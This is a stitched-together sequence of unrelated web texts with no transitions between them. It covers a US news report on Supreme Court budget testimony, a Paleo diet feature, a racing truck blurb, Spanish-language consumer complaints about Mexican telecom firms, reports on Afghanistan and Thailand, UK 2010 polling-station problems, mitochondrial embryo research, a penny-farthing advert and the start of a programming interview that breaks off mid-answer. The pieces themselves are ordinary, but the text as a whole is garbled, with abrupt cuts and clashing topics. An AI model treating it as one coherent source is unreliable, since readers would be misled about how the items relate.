Justice Clarence Thomas told a House Appropriations subcommittee on Thursday that the court wants money for 12 additional police officers , although security personnel want 24 ideally .
Thomas said the court was considering the nation ’s broader fiscal difficulties in asking for only 12 .
ADVERTISEMENT
He said the court has only one person dedicated to threat assessment .
“ We are going to upgrade that because of the volume , ” Thomas said in testimony on the Supreme Court ’s annual budget request .
The justice was responding to a question from Rep. Jo Ann Emerson ( R - Mo. ) , who cited recent incidents in which individuals have targeted federal buildings , including IRS offices .
Members of Congress have also come under threats since President Barack Obama Barack Hussein ObamaUnseemly brawl unlikely to change a thing
It 's now up to health systems to solve our food problems Testing the Electoral College process against judicial overreach MORE signed the healthcare bill into law .
Members of both parties , including Speaker Nancy Pelosi ( D - Calif . ) and Republican House Whip Eric Cantor Eric Ivan CantorThe Hill 's Campaign Report : Florida hangs in the balance Eric Cantor teams up with former rival Dave Brat in supporting GOP candidate in former district Bottom line MORE ( Va. ) , have been targeted .
As the hearing proceeded , U.S. Capitol Police were stepping up their presence around the Capitol in preparation for a large Tea Party rally planned to coincide with Tax Day .
Thomas said the court was making the request “ with some reluctance ” but that the court ’s security personnel felt a strong need after conducting a review .
The review came after the justices were asked specifically about security needs at last year ’s funding hearing .
Most of the new officers would be used to secure areas of the court building and grounds that will be newly opened to the public following completion of its renovation .
“ We understand this is a period of austerity , ” Thomas said in outlining the court ’s $ 77 million overall budget request , which included an increase of 5 percent from the previous year .
“ I emphasize the word ‘ needs , ’ ” he said .
“ We do not look at this as wants or a wish list . ”
Thomas , a member of the court ’s conservative wing since his appointment in 1991 , has become a regular presence at the annual appropriations hearing , ever since former Chief Justice William Rehnquist first asked him to represent the court during the 1990s .
“ I may well be the longest - serving member of this committee , ” he quipped at the outset of his testimony .
“ Maybe I ’ll get off for good time , or good behavior . ”
Justice Stephen Breyer , a member of the court ’s liberal wing , appeared alongside Thomas .
The justices discussed a range of issues related to the federal judiciary , with the notable exception of any actual cases , which the lawmakers recognized as off limits .
At one point , Thomas became involved in a tense exchange with Rep. Barbara Lee ( D - Calif. ) , who pressed the justice on the lack of diversity among the Supreme Court ’s prestigious clerkships .
Lee , the chairwoman of the Congressional Black Caucus , asked if the court had made any effort to attract clerks from minority groups and particularly from law schools outside of the Ivy League .
Thomas responded that while he looks for clerks from a wide range of schools , the justices start from a pool of candidates that have clerked for other federal appellate courts .
Within that pool , Thomas said , “ Hispanics and blacks do not show up in any great numbers . ”
When Lee asked how the justices could increase the pool , Thomas demurred .
“ I do n’t think it ’s up to us to increase the pool , ” he said .
The answer did not satisfy Lee , who brought up Thomas ’s votes against affirmative action during his time on the bench .
“ What ’s in the pool has to do unfortunately with some of your decisions on the Supreme Court that have really shut out any people of color in some of these institutions , ” she said .
Thomas did not respond directly , but he voiced support for having a staff that reflected a broad range of experiences and regions .
The lawmakers asked Thomas and Breyer for their opinions as to why the high court has accepted fewer cases in recent years .
Thomas said there could be a number of reasons , but that Congress , in an indirect way , was partly to blame .
“ Until recently , there has n’t been comprehensive legislation of the kind that usually fills our docket , ” he said .
That prompted Breyer to make a guess : “ I ’d predict that three , four years from today , no one ’s going to ask us again why we have so few cases , ” he said , in an apparent reference to the just - passed healthcare overhaul and other comprehensive measures pending on Capitol Hill .
Breyer was also asked by Rep. Adam Schiff Adam Bennett SchiffHillicon Valley : House panel says Intelligence Community not equipped to address Chinese threats |
House approves bill to send cyber resources to state , local governments
House panel says US intelligence community not equipped to address evolving Chinese threats Trump official releases unverified Russian intel on Clinton previously rejected by Senate panel MORE ( D - Calif . ) about the prospect of opening the high court to cameras for the first time .
The justice backed a pilot program for cameras in lower federal courts , but he said it would take a while before a “ comfort level ” is reached to allow Supreme Court proceedings to be televised .
“ How to get to that comfort level is going to be a long , complicated matter , ” he said .
“ Eventually we ’ll get to the comfort level , but we ’re not there yet . ”
He warned that once cameras are allowed in , “ there ’s no going back . ”
Schiff replied that the only way the justices would reach that point of comfort would be “ by taking the plunge . ”
The discussion of cameras in the courtroom also provided for one of the hearing ’s lighter moments .
Subcommittee Chairman José Serrano ( D - N.Y. ) noted that one argument against allowing cameras would be that the justices ’ remarks could be taken out of context in the overheated atmosphere of cable news .
“ Did you hear Breyer ?
What a jerk !
Did you hear what question he asked ?
Did you hear Thomas ?
Oh my god ! ” Serrano said , doing his best imitation of an MSNBC or Fox News talk show .
At that point , Thomas , who has a well - known reputation for never asking questions during Supreme Court oral arguments , replied , “ No , you mean you did n’t hear me . ”
The room erupted in laughter .
This story was posted at 12 p.m. and updated at 7:15 p.m .
There are plenty of guys in the NFL who are roughly 6 - foot - 6 and 300 pounds .
But it was the fact that John Welbourn had 8 percent body fat that made the New England Patriots ' locker room take notice .
" When I was in New England [ during the '08 preseason ] a bunch of the guys saw the way I ate and asked a lot of questions .
So I ended up writing out some diet stuff for them , " Welbourn said .
" They were pretty interested . "
As they should be .
Welbourn , a 10 - year NFL veteran , had just introduced them to the Paleo Diet , more popularly referred to as the " Caveman Diet . "
But do n't let the catchy name fool you -- there 's plenty of science behind it .
[+]
Enlarge AP Photo / Steven Senne Former NFL player John Welbourn loves the ' Caveman Diet ' .
Loren Cordain has been studying evolutionary nutrition for two decades .
He is a professor at Colorado State University and the author of two books on the subject .
The idea is that for 99.6 percent of our evolutionary history ( 2.6 million to 10,000 years ago ) we ate virtually the same things and therefore our genome is perfectly adapted to those foods : lean meats , seafood , vegetables , fruits and nuts .
" We 've uncovered the diet that humanity evolved with [ during the Paleolithic era ] , " Cordain said .
" And that 's why it does work because it 's consistent with our genes . "
The Paleo Diet does not include cereal grains , legumes , dairy , vegetable oils , salt , alcohol or refined sugars .
Processed foods are the No. 1 enemy .
Followers say if it's got more than one ingredient , it 's not in the Paleo Diet .
There just have n't been enough generations since the agricultural revolution for our bodies to adapt to the dramatic changes to the human diet .
Welbourn was figuring that out on his own long before he met Cordain .
" I sort of naturally found the diet in that I knew a lot of grains and white sugars and processed foods made me feel sick .
I never really cared to eat them , " Welbourn said .
" I did n't really know a name for what the diet was until about three years ago .
It instantly made sense to me since I 'd always gravitated that way . "
But not everyone who encountered the diet took to it immediately .
In fact , even after Cordain published " The Paleo Diet " in 2002 , he had trouble convincing some of his closest friends that it would work for everyone .
One of those people was Joe Friel , who holds a master 's degree in exercise science and is a USA Triathlon and USA Cycling certified elite - level coach .
He is also a founder and past Chairman of the USA Triathlon National Coaching Commission .
" Essentially I argued [ with Cordain ] that it would n't work for athletes .
One day he said to me why do n't you try it and see if it works for you or does n't work for you , " Friel said .
" So I took the challenge , and for one month ate his recommendations and after about three weeks , I began to realize that I was feeling better and training better than I had in a long time . "
With that success , Cordain had found his co-author for a second book , " The Paleo Diet for Athletes , " which they published in 2005 .
But the concept just was n't ready to catch on .
Until now .
Five years after it was first published , " The Paleo Diet for Athletes " is currently No. 2 on Amazon.com for sports training and sports coaching books .
Cordain says most diet books fade in popularity , but this one wo n't go away .
He does n't know exactly how many people follow the diet , but estimates it to be in the millions .
Welbourn , who now owns CrossFit Balboa in Costa Mesa , Calif. , says the explanation is simple .
" I think the biggest reason the book is selling is because it 's kind of the time for it , " Welbourn said .
" People are starting to realize that the way we 've been told to eat for the past 40 or 60 years is just plain wrong . "
Welbourn said he believes so strongly in the diet that he has founded his own company , Paleo Brands , with Cordain serving as an adviser .
Welbourn says the venture grew out of his personal needs .
He travels a lot for training and speaking engagements and was having a difficult time finding the necessary foods on the road .
" You would n't think finding meat , fruit and veggies would be hard , but it 's damn hard in a lot of places , especially airports , " Welbourn said .
" The biggest complaint about the Paleo Diet is ' Yeah , we know we should eat like this , but it 's not convenient for me . '
America is based on convenience and we 're just trying to make the Paleo Diet more accessible . "
Welbourn is n't sure how many of his old Patriots teammates have stuck with the Paleo Diet since he introduced them to it two years ago , but he says he 's always trying to pass along what he 's learned .
He 's constantly going back and forth with Atlanta Falcons tight end Tony Gonzalez , a longtime friend and nutrition fanatic .
Gonzalez swears by pasta , whole wheat and other carbs .
Welbourn keeps sending him research on the Paleo Diet and hopes to one day convert him .
" Do enough guys eat like this in the football community ?
I do n't know .
I still remember on Fridays after practice coming out and seeing huge pizzas , " Welbourn said .
" I think it 'll take a little longer to catch on [ in the NFL ] .
But the sooner people adopt the diet , the sooner they 'll see the benefits . "
The Toyota Tacoma Pikes Peak can hit 60 MPH in 1.6 seconds thanks to a 1,000 HP 2.1 - liter engine .
But it 's only geared to do 132 MPH .
Imagine how crazy that is .
Oh wait , do n't , there 's video .
The " truck " was built and driven by New Zealander Rod Millen ( Rhys 's dad ) for the 1998 Pikes Peak Hillclimb .
The vehicle has nothing in common with the Tacoma and is , in fact , built on a chrome - molly tubular space frame chassis covered in a carbon fiber body .
Power is generated by a 2.1 - liter , four - cylinder , turbocharged and intercooled engine pumping out something in the neighborhood of 1,000 HP .
It can hit 125 MPH in 4.9 seconds .
With this " truck " Millen won the Pikes Peak Unlimited class in both 1998 and 1999 .
Advertisement
This video shows Millen driving the vehicle at the 2007 Goodwood Festival of speed , a non-competitive rolling showcase of rare racecars , not a full - on hillclimb .
Keep that in mind as Millen tries furiously to keep the damn thing on the track , which he manages , we 're guessing , for 75 % of the climb .
God , what a bastard of an automobile .
Adiós gasolineras tramposas : Profeco aplicará norma obligatoria de litros completos
07/09/2020  CIUDAD DE MÉXICO .-
Este lunes el titular de la Procuraduría Federal del Consumidor ( Profeco ) , Ricardo Sheffield , informó acerca de la aplicación de una nueva norma que busca regularizar el abasto de gasolina .
ME ESTAN COBRANDO X 2 CONTRATOS .
YA VINIERON A VERIFICAR Y NO SE ARREGLA EL PROBLEMA ES UN ERROR DE ELLOS ,
Buen dia , les escribo por que estas compañias simpre cobran lo que quieren y nunca les hacen nada .
no hay un organizmo que este regulando los servicios que se otorgan .
Ellos ponen servicios que nunca te indican a la hora de contratación .
Y cuando quieres quitarlos el proceso es demasiado tardado .
Mi plan es de 499 iva incluido , pero da la casualidad que siempre me cobran mas de 700 pesos quesque excedo el numero de mensajes enviados .
La verdad pido un detalle de la linea y que creen ?
ese es un servicio que debes de activar por lo tanto te cobran .
cuando es mi linea y se supone que debo de saber el detalle de la misma , pues resulta que para que suceda esto le debes de pagar a la empresa .
Telecable de zapopan
Hola , gracias .
La empresa telecable de zapopan ofrece 14 meses de servicio por pagar 12 meses a un sólo pago , así lo estibe haciendo por algunos años , tenía el servicio de TVE , telefonía e internet . , .
El internet comenzó a fallar , ya que lo usamos para que mi hija se comuniqué a su empresa , no lo pudo hacer más a pesar de reclamos y orientaciones para componerlo .
Bueno , al final contrate axtel con muy buena respuesta , cancelé telefonía e internet y cuando les pido que me reintegren lo pagado por ésos dos servicios y me dijeron que NO SE DEVUELVE DINERO , SE USARAN COMO PAGO PARA LOS SERVICIOS DE TV .
¿ Se pueden quedar así o se podrían recuperar en efectivo ?
Gracias
KABUL ( Reuters ) - Afghanistan on Monday announced a ban on news coverage showing Taliban attacks , saying such images embolden the Islamist militants , who have launched strikes around the country as NATO forces seize their southern strongholds .
The announcement came on a day when the NATO - led International Security Assistance Force ( ISAF ) fighting the Taliban reported six of its service members had been killed in various attacks .
Journalists will be allowed to film only the aftermath of attacks , when given permission by the National Directorate of Security ( NDS ) spy agency , the agency said .
Journalists who film while attacks are under way will be held and their gear seized .
“ Live coverage does not benefit the government , but benefits the enemies of Afghanistan , ” NDS spokesman Saeed Ansari said .
The agency summoned a group of reporters to announce the ban .
The move was denounced by Afghan journalism and rights groups , which said it would deprive the public of vital information about the security situation during attacks .
“ Such a decision prevents the public from receiving accurate information on any occurrence , ” said Abdul Hameed Mubarez head of the Afghan National Media Union , a group set up to protect Afghan journalists , who often complain of harassment by authorities .
“ The government should not hide their inabilities by barring media from covering incidents , ” said Laila Noori , who monitors media issues for Afghanistan Rights Monitor , the country ’s main liberties watchdog .
“ People want to know all the facts on the ground whenever security incidents take place . ”
The Afghan government banned reporting violence for a single day during a presidential election last year , but otherwise had not had formal restrictions on filming security incidents .
However , journalists have occasionally been beaten by security forces while filming at the scene of incidents in the past .
SUICIDE BOMBER
Two blasts hours apart on Monday killed at least six people in the southern city of Kandahar , birthplace of the Taliban whose fighters are being targeted in a renewed push by NATO - led troops .
One ISAF member was killed in one of the Kandahar strikes .
In various attacks in the country , five other ISAF service members were also killed , the force said .
NATO - led troops launched an offensive last month to drive the Taliban out of their strongholds as part of a plan to hand control of the country to Afghan forces before a planned U.S. troop drawdown that would begin in July 2011 .
U.S. General Stanley McChrystal , the ISAF commander , visited Marjah in Helmand province , the town seized by U.S. Marines in the offensive , one of the biggest operations of the eight - year - old war .
He was joined by Afghan Vice President Karim Khalili and Helmand Governor Gulab Mangal , who met hundreds of local residents at a “ shura , ” or traditional council meeting .
“ The most important thing is to bring peace and stability to the people in Afghanistan .
This is our priority .
This is a promise , ” Khalili told the gathering .
But not all were impressed .
“ You promised not to use big weapons .
Why was my house destroyed ? ” asked Abdul Kader , a white - bearded village elder .
McChrystal told reporters the goal was to build a government in the area that villagers would embrace : “ In the near term , they have to feel represented , they have to feel it ’s fair . ”
An Afghan policeman runs at the site of a blast in Kabul February 26 , 2010 .
REUTERS / Ahmad Masood
There could be 200-300 fighters left in the town “ who were Taliban two weeks ago , ” McChrystal said .
“ Now , whether they still are is a personal choice for each of them .
Some may become sleeper cells waiting for someone to tell them what to do .
Some may just put the gun away and see what ’s going to happen . ”
Fighters have responded with attacks in other parts of the country , using roadside bombs and suicide attacks .
In the past week , the Taliban have carried out four big attacks killing at least 29 people and wounding scores more .
On Friday , two suicide blasts and a two - hour shootout between Afghan forces and the Taliban rocked the capital Kabul , killing 16 people and wounding 37 .
Among those killed were Indian government employees and an Italian diplomat .
In Monday ’s first blast , a suicide bomber blew up a car as NATO - led troops passed in convoy on a road several miles from Kandahar airport , a key NATO base .
Mohammad Ibrahim , a doctor in a Kandahar hospital , said four civilians were killed .
A NATO helicopter evacuated the wounded , and a bridge close by was badly damaged , a Reuters journalist said .
Hours later , a car packed with explosives blew up outside Kandahar ’s main police station , killing a police officer and wounding 16 people .
The French navy has located the flight recorders from an Air France jet which crashed in the Atlantic killing 228 people in June 2009 but the black boxes could remain lost on the seabed , a Defence Ministry spokesman said Thursday .
The recorders have been localised " with a margin of error " of three nautical miles ( five kilometres ) , said General Christian Baptiste , the deputy defence ministry spokesman .
And while the news could reassure relatives of the victims still waiting for an explanation of the cause of the disaster , the spokesman said there was no guarantee the recorders would be brought to the surface .
" This does not mean we are going to retrieve the black boxes because they are not giving off a signal any more and the zone where they are is very rugged terrain , " Baptiste commented .
The French Navy started a new operation on Monday to find the black boxes .
AFP
Tally ho old bean and all that , why not try one of these splendid Penny Farthings on for size ?
This beautiful excuse to don an oversized hat is just the same as the Penny Farthing bicycles of yore , and is a brilliant way of getting around in style .
The front wheel is a whopping 36 inches , while the rear wheel comes in at a slightly more reasonable 12 inches , giving you that classic elevated position associated with this most barmy of bikes .
Of course , we'd be barmy to send you off pedalling into the sunset with the safety features of a vintage Penny Farthing ( otherwise your newly bought oversized hat might end up squished under an articulated lorry ) , so this new version has all the modern safety standards you 'd expect .
The frame is made of durable steel , the pedals are anti-slip ( not sure what that entails , but it 's bound to be a good thing ) , there 's a brake on the rear wheel and the saddle has spring suspension to make your ride a little smoother .
In seriousness , there 's hardly anything more eye - catching than seeing someone roll past on one of these lovely items .
They 're perfect for leisurely Sunday bike rides , fairs , events or basically any occasion when you want to stand out from the usual fleet of bog - standard cyclists .
A full - size Penny Farthing bicycle .
Accurate replica of the age - old original style .
Features a 32 " front wheel and 12 " back wheel .
Durable steel frame .
Steel cranks with anti-slip pedals .
Brake on rear wheel .
Spring suspension on saddle to ensure comfortable ride .
Air tires .
Suitable for ages 16 years +.
Size :-
Nina Paley was approached by Netflix to offer her amazing animated feature Sita Sings the Blues on their streaming service .
Sita retells the saga of Rama and incorporates some vintage jazz , to marvellous effect .
In order to clear this old jazz music , Paley had to go through an enormous rigamarole , and this experience has turned her into an advocate for a more liberal copyright .
So Nina asked if Netflix would stream her movie without DRM .
Netflix refused .
Then Nina asked if she could add some pre-roll to the film advising viewers of places they could get it for free and without DRM .
Netflix refused .
This mirrors my experience with Audible and the Kindle , where I , as the copyright holder and creator , was not allowed to offer my work without DRM and / or a restrictive license - agreement — I was n't even allowed to add something to the text or audio saying , " I release you from the license agreement you 've clicked through . "
Nina 's done what I did .
She 's refused to license her works for a platform that restricts her audience against her wishes , and she 's told the world what she 's done and why .
It cost her thousands of dollars , but she stuck to her principles , and set an example for other creators , as well as making sure that her viewers got a fair deal .
Bravo !
I 've been the " change I want to see " in regards to copyright monopolies .
People told me I 'd lose everything by copylefting Sita , including all hope of professional distribution .
But in fact , some professional distributors became willing to distribute Sita without claiming monopolies over it , and we 're all fine .
I 'd still love Sita to be offered through Netflix 's online channels ; if they ever offer DRM - free video - on - demand , I hope they remember Sita Sings the Blues .
For now , people will just have to obtain Sita by visiting the vast big Internet outside of Netflix .
Most of the Internet still is n't enclosed by Netflix , or Amazon , or iTunes .
Most of the Internet is still Free ; I 'm doing what little I can to keep it that way .
I 'm sad to lose the potential viewers who may have found Sita through Netflix 's electronic delivery .
But maybe some of those Netflix subscribers will discover the rest of the Internet because of my tiny act of resisting DRM .
What Nina said .
I love Audible 's convenience and selection .
I love ebooks .
I dream of the day when I , as a copyright holder and creator , can partner with the iTunes Store , Amazon and Audible to offer digital versions of my works on simple terms like , " Respect copyright law " and " You bought it , you own it . "
Turning down Netflix
( via The Command Line )
Well , this may be the most unexpected fact to come out of the Robin Hood press tour : Michael Jackson used to prank call Russell Crowe !
The pair became so friendly after L.A. Confidential that Jackson would occasionally call up Crowe and “ a gruff voice would say something was wrong , then this tiny little voice said , ‘ Do n’t worry .
This is Michael , ” the actor told GQ UK .
Crowe would also call L.A. Confidential author James Ellroy to say things like , “ Woof - woof , hear the demon dog bark .
He ’s got a 12 - inch wanger and it glows in the dark . ”
Which , makes it seem like someone needs to explain to Crowe the difference between a prank call and a creepy message .
[ Stuff UK ]
Metapodestroyer is a conceptual album about Metapod .
Love Through Cannibalism mixes nintendocore with psychedelic music and silly drum and bass beats , in an epic history about pokemon battles , metanihilism and harden attacks .
Love Through Cannibalism delivers a link of his work in high quality as a part of this wiki : Download by Mediafire ( 320 kbps )
View wiki
“ The situation of the last two or three days gave me no choice , ” he said , referring to his decision to use force .
“ I had to enforce the law .
If the government had done nothing , it would have shown its weakness . ”
Constrained by strict rules of engagement , soldiers used mostly tear gas and rubber bullets , Mr. Abhisit said .
He conceded the accuracy of protesters ’ claims that live ammunition had also been used , but he said it had been fired only into the air or in cases of self - defense .
The army said that 60 soldiers had been wounded , including two who had been shot .
There were several reports that protesters had used explosive devices , and Mr. Abhisit said that these blasts had caused many of the injuries .
Image
Thai soldiers aided an antigovernment protester who was overcome by tear gas during street battles in Bangkok on Saturday .
Credit ...
Agnes Dherbeys for The New York Times
The government - run Erawan Medical Center said that at least 18 people had been killed and 678 wounded .
It said four of the dead were soldiers and the rest were civilians .
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement
The chaos which led to hundreds of voters being turned away from polling stations will " never happen again " , the Electoral Commission 's head has said .
Jenny Watson promised a " thorough review " after some voters said they were " fuming " at being denied a vote .
Police had to deal with queues as the voting deadline passed in Sheffield , Manchester , Birmingham , Liverpool , Newcastle , parts of London and Surrey .
One Sheffield official said the highest turnout for 30 years " caught us out " .
The main parties all expressed concerns , although there have not been any reports of results being challenged .
' Extremely serious '
Ms Watson said the problems experienced in a number of constituencies were " clearly not acceptable " .
" It 's extremely serious and we 're going to have an inquiry into it and find out what happened , " she said .
Ms Watson blamed Britain's " Victorian " voting system , which she said was at " breaking point " .
She added that there may need to be a change in the law .
Legally , polling station doors must close at 2200 BST and no ballot papers are issued after that time , although everyone who has a ballot paper by then must be able to vote .
Among the incidents : • Police were called to a polling station in Lewisham , south London , where about 300 people had still to vote by 2200 BST .
•
In Hackney , London , angry would - be voters staged a sit - in when polls closed .
•
In his Sheffield Hallam constituency , Liberal Democrat leader Nick Clegg went to offer his apologies to frustrated voters at a polling station in Ranmoor after they queued for more than three hours .
• Doors were closed on 200 potential voters in Ladybarn in Withington , Manchester .
•
In Liverpool , voters were left waiting when one polling station ran out of ballot papers .
•
Voters were turned away amid long queues in St Paul 's Church in Birmingham , and long queues were reported in Mere Green polling station in Sutton Coldfield . •
There were reports of voters being turned away after long queues in Weybridge , Surrey .
•
Long queues were reported at two polling stations in Newcastle .
A spokesman for Gordon Brown said the prime minister was " very concerned " about the reports of people being turned away from polling stations and " would support a thorough investigation into them " .
It is an outrage in a civilised country like ours that this can happen , especially to people who are trying to vote after doing a day 's work
Voters share their frustrations Q&A : Voting problems Overseas voters ' denied ballots '
Conservative Party leader David Cameron thanked officials in his Witney constituency for a well - run election day , but said that had not been the case in some parts of the country .
" An early task for a new government is to get to the bottom of what has happened and make sure that it never happens again , " he said .
Liberal Democrats leader Nick Clegg , who went to speak to voters who had been waiting in long queues at a polling station in his Sheffield constituency , said he shared the " bitter dismay " of those who were unable to vote .
" That should never , ever happen again in our democracy , " he said .
BBC political editor Nick Robinson said : " What a tragedy that , after a campaign which engaged and energised many who were previously cynical about politics , tonight 's story may be being over - shadowed by the extraordinary revelation that Britain cannot competently run the most basic part of the democratic process . "
' Fuming ' voters
Many voters contacted the BBC to say they had been denied the chance to vote because the polls closed while they were still queuing .
Please turn on JavaScript .
Media requires JavaScript to play .
Jo -Ann Stranger , who failed to vote in Hackney South and Shoreditch , said it was an " outrage " .
" I , along with about 100 other people , were turned away from our local polling station , having waited 45 minutes to vote .
" The officers closed the door on the queue at 9.50 pm , refusing entry to anyone standing outside , " she said .
" It is an outrage in a civilised country like ours that this can happen , especially to people who are trying to vote after doing a day 's work .
" Whether it will affect the vote , I do n't know , but the election cannot stand , given the number of voters potentially unable to vote this evening . "
Kathy Murray , from Withington , Manchester , said : " I 'm fuming .
I queued for over an hour and had the doors shut on me , along with about 250 others , at 10 pm .
" We initially went at 6 pm , but it was too busy so we went back an hour later , but there were still big queues .
" We went back at 9 pm but after waiting for an hour , we still could n't vote . "
' Got wrong '
In Sheffield , returning officer John Mothersole apologised to voters who were turned away , saying : " We got this wrong . "
He said the turnout had been " phenomenal ... probably the highest turnout in 30 years " .
Deputy returning officer Lee Adams said about 200 people were turned away at Ranmoor and police dealt with a crowd of approximately 100 angry would - be voters .
She apologised and admitted staff struggled to cope , adding : " We increased the staffing at about 4 pm when the staff told us they needed help .
These people have a right to sue - they will get at least £ 750 in my view
Human rights lawyer Geoffrey Robertson QC " Unfortunately , the combination of the numbers turning up and the fact that many were students and did n't have their polling cards just meant it took longer to process . "
But one presiding officer , Nick Baldev , laid some of the blame on voters , telling the BBC : " Many did not have their polling cards , which significantly adds time .
Some people went to the wrong polling station .
" And ... the absolute laziness from the elector by not joining queues when they arrive , returning at a later time only to find a longer line and re-returning at 2200 BST , which , as it clearly states , is closing time . "
However , there was good news for some voters stuck in queues as the deadline approached .
At one polling station in Lewisham , south - east London , polling cards were handed out to people queuing , while at two stations in Newcastle those in the queue were ushered into the building before the doors were shut at 2200 .
' Separate queue '
The Electoral Commission said each returning officer decided the number of polling stations in their constituency and the number of electors allocated to each station .
" There should have been sufficient resources allocated to ensure that everyone who wished to vote was able to do so , " a statement said .
It added that anyone affected should e-mail them at info@electoralcommission.org.uk as soon as possible , and that it aimed to publish an interim report by the end of next week .
Its full report is due to be published in July .
At the Ranmoor polling station in Mr Clegg 's Sheffield Hallam constituency , many students were unable to vote because they were put in a separate , slower queue to other members of the public , the National Union of Students ( NUS ) has claimed .
The NUS said the queue containing non-students was " fast - tracked " .
" What message does this send to first time voters whose votes will not be counted ? " said NUS national president Wes Streeting .
Legal challenge
Anyone wishing to contest the result in their constituency because of people not being able to vote needs to apply to the Election Petitions Office .
Please turn on JavaScript .
Media requires JavaScript to play .
The legal application costs £ 5,000 and the case would ultimately be heard by two High Court judges , who could rule that another election must take place .
If they rule in your favour , you would get the £ 5,000 back , if not , then you would lose the money .
Human rights lawyer Geoffrey Robertson QC has also said that people denied the right to vote could sue for compensation .
" These people have a right to sue , " he said .
" They will get at least £ 750 in my view .
Under the European Convention you have a right to vote .
" They were terribly disappointed , they should all sue and get money from the election commission , which seems to have incompetently overseen it . "
Civil liberties group Liberty is asking anyone who was not able to cast their vote to contact its organisation .
" Liberty will use all legal and campaigning means to ensure that this disgrace is never repeated , " said director Shami Chakrabarti .
" This is particularly pressing given the possibility of further elections in the medium term . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
By Fergus Walsh
Medical correspondent , BBC News
Mitochondria are involved in energy production Embryos containing DNA from a man and two women have been created by scientists at Newcastle University .
They say their research , published in the journal Nature , has the potential to help mothers with rare genetic disorders have healthy children .
The aim is to prevent damaged DNA in mitochondria - the " batteries " which power the cell - from being passed on by the mother .
IVF clinics are not currently permitted to carry out the procedure .
Around one in 200 children is born each year with mutations in the mitochondrial DNA .
In most cases this causes only mild disease , sometimes without symptoms .
But around one in 6,500 children is born with mitochondrial disease , which can cause serious and often fatal conditions , including muscular weakness , blindness and heart failure .
If the Newcastle results are taken forward to medical application , they need to be applied under very strict controls , and only where serious disease is otherwise likely to result
Dr Donald Bruce , ethics expert
The scientists have developed a technique which would potentially allow them to replace defective mitochondria during IVF .
The research , funded by the Muscular Dystrophy Campaign , Medical Research Council and the Wellcome Trust , used newly fertilised eggs left over from IVF treatment .
The nuclei from the father 's sperm and the mother 's egg , which contain the parents ' DNA , were removed , leaving behind the faulty mitochondria .
The nuclei were put into another egg from which the nucleus had been removed , but which retained its mitochondria .
This new embryo contained the genes from both parents plus a tiny amount of mitochondrial DNA from the donor egg .
Please turn on JavaScript .
Media requires JavaScript to play .
" What we 've done is like changing the battery on a laptop , " said lead author Professor Doug Turnbull .
" The energy supply now works properly , but none of the information on the hard drive has been changed .
" A child born using this method would have correctly functioning mitochondria , but in every other respect would get all their genetic information from their father and mother . "
Legal hurdles
The Newcastle team created a total of 80 embryos .
These were cultured for up to eight days in the laboratory under the terms of a licence granted by the Human Fertilisation and Embryology Authority ( HFEA ) .
Mitochondria
Tiny bodies in cells that act like batteries to produce energy Contain their own DNA , which is distinct from nuclear DNA Contains only 37 genes compared with around 23,000 in the cell nucleus
The team is planning further studies to check the safety and efficiency of the procedure .
The law currently prevents the technique being used in fertility treatment .
A licence to carry out the study was refused on two occasions before being granted five years ago .
Ethics expert , Dr Donald Bruce , former director of the Society , Religion and Technology Project of the Church of Scotland , said the research raised important ethical issues as well as potential risks .
He said : " If the Newcastle results are taken forward to medical application , they need to be applied under very strict controls , and only where serious disease is otherwise likely to result . "
The work raised several ethical problems , he explained , including safety risks , children with DNA from two mothers , and making genetic changes to unborn children .
' Too late '
The Newcastle team say that the DNA from the second woman would be only a few genes , compared with at least 23,000 genes inherited from a parent .
Please turn on JavaScript .
Media requires JavaScript to play .
But although the genetic changes produced by the technique would be small , they would be permanent and passed on down the generations .
Sharon Bernardi , aged 44 , from Sunderland , inherited mitochondrial disease from her mother .
The condition has claimed the lives of six of her children , all of them dying within a few days of birth .
Her only surviving child , Edward , who is 20 , suffers from a serious mitochondrial disease and needs constant care .
Sharon said : " It was devastating to lose my children , and this happened again and again .
I feel lucky to have Edward , but he has very serious health problems as a result of the faulty DNA .
" It will be too late for me but it would be amazing if scientists can prevent this in the future so that others do n't have to go through what I did . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
1. I 'm Sadek Drobi , I 'm here with Jim Coplien at QCon 2010 .
Jim , can you tell us a bit about yourself and what you 've been up to lately ?
It 's wonderful to be here at QCon .
I am a consultant these days , I 'm living in Denmark and I 've been doing a lot of work recently both in Agile and in architecture .
I guess what I 've been up to recently is this year actually enjoying life a little bit more , taking a lot of vacation .
I just came back from a week in the Finnish woods , having a good time skiing and thinking that was fun .
I 've been working on a book and doing some training and traveling a little bit , just having fun , keeping connections up .
2. Jim , as a programmer , I 've been looking around .
I 'm seeing a lot of languages around and I try to discover what there is on the JVM , Scala or whatever , Java , Clojure - a lot of languages .
I 'm seeing even on the .NET side of things there is F#. Looking at these languages , trying to discover them , I see some similarities between languages , some of them overlap , but they do different things in a different way .
I see a lot of things , but I do n't know how the think about them .
Jim , you are the paradigm guy , so why do n't you tell us about this kind of things - a lot of languages , a lot of paradigms , how to do about them ?
Looking at this from the point of view of design paradigms , it 's getting to be an interesting time because of languages like Scala and F# .
There have always been functional languages around , Scheme has been around for a long time and CLOS ( the Common Lisp Object System ) .
They are very interesting languages , but they have not been culturally compatible with C , basically .
The C language really dominated programming certainly through the 80s and the 90s .
And you find people like Richard Gabriel , who is the CLOS and Scheme guy kind of bitterly saying that C really killed programming .
C is the last programming language .
It may be called Java , but it 's still C. I tend to agree with Dick .
At the level that 's important , which is a level where we think about things , that C and C++ and Java and C# are all the same programming language .
They are all in the van Neumann paradigm .
We tend to think about things imperatively .
Maybe we package things into these things called objects and sometimes it makes things a little worse , sometimes a little better .
But what 's happening now , is it seems that , for whatever reason and I think the reason is multicore , is that these functional languages have become at least fashionable , probably for all the wrong reasons .
And I think the expectations on these languages are far too high in terms of being able to solve the problems and people foresee that the multicore and parallelism are going to provide .
Nonetheless I think it 's healthy , at least for the thinking people , because it 's going to get the thinking people interested in broader areas of language and exploring alternatives to this rut that we 've been in , which is the C language rut for so many years .
3 . I 've got for example in C# today , multi paradigms , because of the evolution or even in Scala the same example goes .
I can do things with objects , with inheritance , with generics , which is something like templates in C++ and with functions .
Here I have a problem and now I should find what to do with this , which one to choose , which one works for me better .
What do you say about that ?
This actually brings an interesting discussion to mind that I had many years ago .
This was probably in the mid 1990s and it was between me and my good friend Tim Budd .
